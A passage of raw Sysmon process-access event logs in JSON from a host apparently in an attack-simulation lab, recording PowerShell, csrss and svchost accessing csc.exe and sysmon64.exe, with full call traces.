Images_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+ead8b800(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a8824c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a64025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a63cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6751510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a2488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a82d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a663c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a663c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a663c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a663c0(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.220","SourceProcessGUID":"{41C8662E-20C0-5F25-0000-001025EA0600}","SourceProcessId":"4240","SourceThreadId":"4500","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20C3-5F25-0000-0010CE130700}","TargetProcessId":"2860","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+ead8b800(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+ead8b800(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a8824c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a64025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a63cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6751510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a2488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a82d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a663c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a663c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a663c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66a663c0(wow64)","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4674,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.220\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20C3-5F25-0000-0010CE130700}\r\nTargetProcessId: 2860\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.220","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20C3-5F25-0000-0010CE130700}","TargetProcessId":"2860","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4675,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.220\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.220","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4676,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.220\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.220","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4677,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.220\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.220","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4678,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.220\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.220","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4679,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.220\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.220","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4680,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.220\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 